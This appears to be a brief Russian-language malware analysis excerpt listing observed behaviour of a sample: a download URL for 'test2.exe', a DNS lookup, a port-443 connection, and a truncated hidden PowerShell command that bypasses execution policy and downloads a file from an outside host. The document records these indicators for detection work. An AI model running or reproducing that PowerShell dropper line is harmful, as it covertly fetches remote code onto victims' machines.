Техническая информация
- https://www.up##ad.ee/download/11253413/460f94a558d816ef7ede/test2.exe
- 'up##ad.ee':443
- DNS ASK up##ad.ee
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Executionpolicy bypass -noprofile -windowstyle hidden -command "Set-Content -value (new-object System.net.webclient).downloaddata( 'https://www.up##ad.ee/download/11253413/460f94a558d816ef7e...' (со скрытым окном)